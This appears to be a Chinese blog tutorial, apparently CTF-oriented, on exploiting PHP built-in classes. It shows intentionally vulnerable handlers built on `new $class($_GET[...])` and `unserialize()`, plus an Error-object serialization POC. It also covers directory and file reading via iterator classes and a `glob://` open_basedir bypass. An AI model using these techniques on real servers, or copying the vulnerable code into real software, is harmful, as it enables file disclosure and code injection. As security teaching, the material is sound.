PHP原生类
异常原生类
error:(PHP7,8)
Exception:(PHP5,7,8)
1 2 3 4 5 6 7 8 9 10
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir'];
$a = new Error($dir);
echo $a; }
|
data:image/s3,"s3://crabby-images/fe97d/fe97de8d7dad079b5bd19583fb5c08521fa0f7c5" alt=""
那,既然这样,那我有个大胆的想法。。
1 2 3 4 5 6 7 8 9 10 11
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir']; $class = $_GET['class'];
$a = new $class($dir);
echo $a; }
|
data:image/s3,"s3://crabby-images/f198d/f198d3b069df487fcf0e17707aea38314d28d971" alt=""
当然通常环境下,开发者通常也不会在程序内留下可控的创建新类对象,可能会有以下的情况:
1 2 3 4 5 6 7 8
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir']; $a = unserialize($dir); echo $a; }
|
这时候我们编写poc:
1 2 3 4 5 6
| <?php $a = new Error("<?php phpinfo();?>"); $b = serialize($a); echo urlencode($b);
|
data:image/s3,"s3://crabby-images/1e2c9/1e2c965a4b909f91b20c4b7f6d3efbf9219ffc5f" alt=""
原生类读取目录:
DirectoryIterator:(PHP5,7,8)
读取目录下单个文件(目录)名,若需要全部打印出来要循环
1 2 3 4 5 6 7 8 9 10 11 12
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir'];
$a = new FilesystemIterator($dir);
foreach($a as $f){ echo($f->__toString().'<br>'); } }
|
data:image/s3,"s3://crabby-images/ecdb2/ecdb287e3158c4b5e0cc51a8df6ae4efbd9a6415" alt=""
FilesystemIterator:(PHP 5>=5.3,7,8,DirectoryIterator的子类)
DirectoryIterator
和FilesystemIterator
均有一个__toString()
方法,将获取的结果转为字符串
1 2 3 4 5 6 7 8 9 10 11 12
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir'];
$a = new DirectoryIterator($dir);
foreach($a as $f){ echo($f->__toString().'<br>'); } }
|
data:image/s3,"s3://crabby-images/bc4b2/bc4b2025dfbc237de00c3d5b9969940ee61c9109" alt=""
结合glob://伪协议可绕过open_basedir的限制:
data:image/s3,"s3://crabby-images/0c929/0c929be4e8df4061c151902bffcf7e3e025b832c" alt=""
GlobIterator:(PHP 5>=5.3,7,8)
1 2 3 4 5 6 7 8 9 10 11 12
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir'];
$a = new GlobIterator($dir);
foreach($a as $f){ echo($f->__toString().'<br>'); } }
|
data:image/s3,"s3://crabby-images/c6342/c63426b7bcc5c265053c53a03609ca706c2c2dfb" alt=""
读取文件:
SplFileObject:
1 2 3 4 5 6 7 8 9 10 11 12
| <?php highlight_file(__FILE__);
if($_GET['dir']){ $dir = $_GET['dir'];
$a = new SplFileObject($dir);
foreach($a as $f){ echo($f); } }
|
data:image/s3,"s3://crabby-images/d9ca1/d9ca1d87aff80e5d69e4bad9328a298436a8d547" alt=""
SoapClient:
ReflectionMethod: